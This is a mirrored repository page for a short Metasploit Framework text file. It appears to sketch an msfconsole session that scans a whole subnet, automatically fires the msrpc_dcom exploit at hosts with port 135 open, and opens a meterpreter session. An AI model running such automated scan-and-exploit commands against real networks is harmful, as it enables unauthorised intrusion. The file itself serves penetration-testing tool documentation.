mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
bdda20cb14
git-svn-id: file:///home/svn/incoming/trunk@2490 4d416f70-5f16-0410-b530-b9f4589650da
16 lines
393 B
Plaintext
16 lines
393 B
Plaintext
msfconsole > jobinit recon tcp_port_scan 10.0.0.0/24 0-65535
|
|
Job 1 created.
|
|
msfconsole > autoexec exploit msrpc_dcom when RPORT=135
|
|
The msrpc_dcom will be automatically executed when:
|
|
|
|
1. Remote port 135 is found to be open.
|
|
msfconsole > jobexec 1
|
|
Job 1 is now executing
|
|
msfconsole >
|
|
Session 1 is ready for host 10.0.0.7
|
|
msfconsole > interact 1
|
|
meterpreter> use -m Net
|
|
...
|
|
^Z
|
|
msfconsole >
|